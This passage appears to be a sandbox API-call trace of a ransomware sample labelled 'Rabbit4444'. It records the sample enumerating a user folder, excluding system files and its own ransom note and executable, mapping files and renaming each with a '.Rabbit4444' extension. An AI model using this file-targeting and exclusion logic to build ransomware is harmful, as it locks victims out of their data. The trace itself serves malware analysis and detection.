CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0071.109] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0071.112] FlushFileBuffers (hFile=0x228) returned 1 [0071.113] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0071.117] CloseHandle (hObject=0x228) returned 1 [0071.117] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets") returned 111 [0071.117] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0071.117] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1e04053, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7edfd5ce, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf3b4d105, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102410 [0071.117] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.117] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.117] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0071.118] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0071.118] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc1e04053, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7edfd5ce, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf3b4d105, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.120] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.120] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0071.120] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0071.120] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0071.120] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0071.120] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf3b4d105, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf3b4d105, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3b4d105, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0071.120] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.120] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0071.120] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x820a4f5e, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x820a4f5e, ftLastAccessTime.dwHighDateTime=0x1d327b4, ftLastWriteTime.dwLowDateTime=0x8283e777, ftLastWriteTime.dwHighDateTime=0x1d327b4, nFileSizeHigh=0x0, nFileSizeLow=0x323, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77", cAlternateFileName="015096~1")) returned 1 [0071.120] lstrcmpiW (lpString1="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.120] lstrcmpiW (lpString1="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.120] lstrcmpiW (lpString1="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77", lpString2="Rabbit4444.exe") returned -1 [0071.120] lstrcmpiW (lpString1="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77", lpString2=".") returned 1 [0071.120] lstrcmpiW (lpString1="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77", lpString2="..") returned 1 [0071.120] lstrcmpiW (lpString1="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77", lpString2="windows") returned -1 [0071.120] lstrcmpiW (lpString1="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77", lpString2="bootmgr") returned -1 [0071.120] lstrcmpiW (lpString1="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77", lpString2="pagefile.sys") returned -1 [0071.120] lstrcmpiW (lpString1="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77", lpString2="boot") returned -1 [0071.121] lstrcmpiW (lpString1="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77", lpString2="ids.txt") returned -1 [0071.121] lstrcmpiW (lpString1="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77", lpString2="NTUSER.DAT") returned -1 [0071.121] lstrcpyW (in: lpString1=0x130ec18, lpString2="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77" | out: lpString1="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77") returned="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77" [0071.121] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77", dwFileAttributes=0x0) returned 1 [0071.121] lstrlenW (lpString="0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77") returned 64 [0071.121] lstrlenW (lpString="Rabbit4444") returned 10 [0071.121] lstrcmpiW (lpString1="33c2fb3c77", lpString2="Rabbit4444") returned -1 [0071.121] lstrlenW (lpString=".dll") returned 4 [0071.121] lstrcmpiW (lpString1="3c77", lpString2=".dll") returned 1 [0071.121] lstrlenW (lpString=".lnk") returned 4 [0071.121] lstrcmpiW (lpString1="3c77", lpString2=".lnk") returned 1 [0071.121] lstrlenW (lpString=".ini") returned 4 [0071.121] lstrcmpiW (lpString1="3c77", lpString2=".ini") returned 1 [0071.121] lstrlenW (lpString=".sys") returned 4 [0071.121] lstrcmpiW (lpString1="3c77", lpString2=".sys") returned 1 [0071.121] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.122] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.122] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16243248194) returned 1 [0071.122] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=803) returned 1 [0071.122] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0071.122] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0071.122] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x630, lpName=0x0) returned 0x27c [0071.123] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x630) returned 0x70000 [0071.124] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110be8 [0071.124] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0071.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110be8 | out: hHeap=0xe0000) returned 1 [0071.124] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0071.124] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0071.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0071.124] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16243502830) returned 1 [0071.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0071.124] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0071.124] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.124] CloseHandle (hObject=0x27c) returned 1 [0071.125] CloseHandle (hObject=0x260) returned 1 [0071.125] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77.Rabbit4444") returned 187 [0071.125] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\0150965e1ace000139d39799567eacbb327039e75b0bb31114626f33c2fb3c77.rabbit4444"), dwFlags=0x1) returned 1 [0071.126] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd206161f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd206161f, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xd452fbd5, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x16b10, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037", cAlternateFileName="06A8BF~1")) returned 1 [0071.126] lstrcmpiW (lpString1="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.126] lstrcmpiW (lpString1="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.126] lstrcmpiW (lpString1="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037", lpString2="Rabbit4444.exe") returned -1 [0071.126] lstrcmpiW (lpString1="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037", lpString2=".") returned 1 [0071.126] lstrcmpiW (lpString1="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037", lpString2="..") returned 1 [0071.126] lstrcmpiW (lpString1="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037", lpString2="windows") returned -1 [0071.126] lstrcmpiW (lpString1="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037", lpString2="bootmgr") returned -1 [0071.126] lstrcmpiW (lpString1="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037", lpString2="pagefile.sys") returned -1 [0071.126] lstrcmpiW (lpString1="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037", lpString2="boot") returned -1 [0071.126] lstrcmpiW (lpString1="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037", lpString2="ids.txt") returned -1 [0071.126] lstrcmpiW (lpString1="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037", lpString2="NTUSER.DAT") returned -1 [0071.126] lstrcpyW (in: lpString1=0x130ec18, lpString2="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037" | out: lpString1="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037") returned="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037" [0071.126] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037", dwFileAttributes=0x0) returned 1 [0071.127] lstrlenW (lpString="06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037") returned 64 [0071.127] lstrlenW (lpString="Rabbit4444") returned 10 [0071.127] lstrcmpiW (lpString1="6bfde8d037", lpString2="Rabbit4444") returned -1 [0071.127] lstrlenW (lpString=".dll") returned 4 [0071.127] lstrcmpiW (lpString1="d037", lpString2=".dll") returned 1 [0071.127] lstrlenW (lpString=".lnk") returned 4 [0071.127] lstrcmpiW (lpString1="d037", lpString2=".lnk") returned 1 [0071.127] lstrlenW (lpString=".ini") returned 4 [0071.127] lstrcmpiW (lpString1="d037", lpString2=".ini") returned 1 [0071.127] lstrlenW (lpString=".sys") returned 4 [0071.127] lstrcmpiW (lpString1="d037", lpString2=".sys") returned 1 [0071.127] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.128] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.128] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16243846620) returned 1 [0071.128] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=92944) returned 1 [0071.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0071.128] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0071.128] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16e10, lpName=0x0) returned 0x27c [0071.129] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16e10) returned 0x70000 [0071.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x111008 [0071.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0071.134] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x111008 | out: hHeap=0xe0000) returned 1 [0071.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0071.134] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.135] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0071.135] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.135] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0071.135] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16244544591) returned 1 [0071.135] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0071.135] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0071.135] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0071.136] CloseHandle (hObject=0x27c) returned 1 [0071.136] CloseHandle (hObject=0x260) returned 1 [0071.136] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037.Rabbit4444") returned 187 [0071.136] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\06a8bff69bb230899a8ae51e86b9db0082d5f76a15d1b63aad42a26bfde8d037.rabbit4444"), dwFlags=0x1) returned 1 [0071.137] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf29bb3b9, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xf29bb3b9, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0xf406197f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x176831, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0", cAlternateFileName="093749~1")) returned 1 [0071.137] lstrcmpiW (lpString1="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0071.137] lstrcmpiW (lpString1="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0071.137] lstrcmpiW (lpString1="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0", lpString2="Rabbit4444.exe") returned -1 [0071.137] lstrcmpiW (lpString1="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0", lpString2=".") returned 1 [0071.137] lstrcmpiW (lpString1="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0", lpString2="..") returned 1 [0071.137] lstrcmpiW (lpString1="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0", lpString2="windows") returned -1 [0071.137] lstrcmpiW (lpString1="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0", lpString2="bootmgr") returned -1 [0071.137] lstrcmpiW (lpString1="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0", lpString2="pagefile.sys") returned -1 [0071.137] lstrcmpiW (lpString1="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0", lpString2="boot") returned -1 [0071.137] lstrcmpiW (lpString1="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0", lpString2="ids.txt") returned -1 [0071.137] lstrcmpiW (lpString1="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0", lpString2="NTUSER.DAT") returned -1 [0071.137] lstrcpyW (in: lpString1=0x130ec18, lpString2="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0" | out: lpString1="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0") returned="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0" [0071.137] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0", dwFileAttributes=0x0) returned 1 [0071.138] lstrlenW (lpString="093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0") returned 64 [0071.138] lstrlenW (lpString="Rabbit4444") returned 10 [0071.138] lstrcmpiW (lpString1="fde9b7e8d0", lpString2="Rabbit4444") returned -1 [0071.138] lstrlenW (lpString=".dll") returned 4 [0071.138] lstrcmpiW (lpString1="e8d0", lpString2=".dll") returned 1 [0071.138] lstrlenW (lpString=".lnk") returned 4 [0071.138] lstrcmpiW (lpString1="e8d0", lpString2=".lnk") returned 1 [0071.138] lstrlenW (lpString=".ini") returned 4 [0071.138] lstrcmpiW (lpString1="e8d0", lpString2=".ini") returned 1 [0071.138] lstrlenW (lpString=".sys") returned 4 [0071.138] lstrcmpiW (lpString1="e8d0", lpString2=".sys") returned 1 [0071.138] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0071.138] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0071.139] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16244928858) returned 1 [0071.139] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1534001) returned 1 [0071.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0071.139] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0071.139] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x176b40, lpName=0x0) returned 0x27c [0071.140] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x176b40) returned 0x2f10000 [0071.176] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x110df8 [0071.176] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0071.176] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x110df8 | out: hHeap=0xe0000) returned 1 [0071.176] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0071.176] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x115180 [0071.177] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0071.177] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115180 | out: hHeap=0xe0000) returned 1 [0071.177] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0071.177] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16248737214) returned 1 [0071.177] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0071.177] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0071.177] UnmapViewOfFile (lpBaseAddress=0x2f10000) returned 1 [0071.190] CloseHandle (hObject=0x27c) returned 1 [0071.191] CloseHandle (hObject=0x260) returned 1 [0071.191] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0.Rabbit4444") returned 187 [0071.191] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\093749a9afa787d6698b32a8f2be84497248372c8fdaaad018156efde9b7e8d0.Rabbit4444" (normalized: 